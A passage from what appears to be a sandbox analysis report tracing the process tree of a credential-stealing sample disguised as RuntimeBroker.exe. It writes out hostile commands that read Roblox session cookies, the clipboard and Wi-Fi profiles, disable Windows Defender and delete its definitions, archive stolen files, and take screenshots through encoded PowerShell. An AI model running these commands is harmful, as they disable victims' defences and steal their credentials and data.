pAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        20⤵
        
        PID:5936
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0q02bg3\g0q02bg3.cmdline"
        21⤵
        
        PID:1864
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F94.tmp" "c:\Users\Admin\AppData\Local\Temp\g0q02bg3\CSC65BC372D77ED40E1804DF044A1EEDA85.TMP"
        22⤵
        
        PID:3636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:3440
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:4260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:420
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:4564
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:1696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:720
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:5596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        19⤵
        
        PID:2464
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        20⤵
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        19⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        19⤵
        
        PID:5784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:2880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        19⤵
        
        PID:5864
        
        C:\Windows\system32\getmac.exe
        
        getmac
        20⤵
        
        PID:1080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\X0RqT.zip" *"
        19⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\X0RqT.zip" *
        20⤵
        Executes dropped EXE
        
        PID:3588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        19⤵
        
        PID:4172
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        20⤵
        
        PID:3912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        19⤵
        
        PID:5484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:6140
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        20⤵
        
        PID:2464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        19⤵
        
        PID:2772
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        20⤵
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        19⤵
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        19⤵
        
        PID:2944
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:5532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        19⤵
        
        PID:1176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        20⤵
        
        PID:3740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:6128
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        16⤵
        Executes dropped EXE
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        17⤵
        Executes dropped EXE
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        15⤵
        Executes dropped EXE
        
        PID:5860
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        16⤵
        Executes dropped EXE
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        15⤵
        Executes dropped EXE
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        13⤵
        Executes dropped EXE
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        12⤵
        Executes dropped EXE
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        13⤵
        Executes dropped EXE
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        11⤵
        Executes dropped EXE
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        12⤵
        Executes dropped EXE
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        10⤵
        Executes dropped EXE
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        10⤵
        Executes dropped EXE
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        9⤵
        Executes dropped EXE
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        9⤵
        Executes dropped EXE
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
        11⤵
        
        PID:2684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        11⤵
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3476
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        12⤵
        Deletes Windows Defender Definitions
        
        PID:5496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        11⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:3400
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        12⤵
        Views/modifies file attributes
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'"
        11⤵
        
        PID:4172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍ .scr'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        11⤵
        
        PID:4108
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        12⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        11⤵
        
        PID:8
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        12⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        11⤵
        
        PID:2336
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        11⤵
        Clipboard Data
        
        PID:3720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        12⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        11⤵
        
        PID:4912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3624
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        12⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:1212
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        11⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5116
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        12⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        11⤵
        
        PID:3412
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        12⤵
        Gathers system information
        
        PID:5172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        11⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM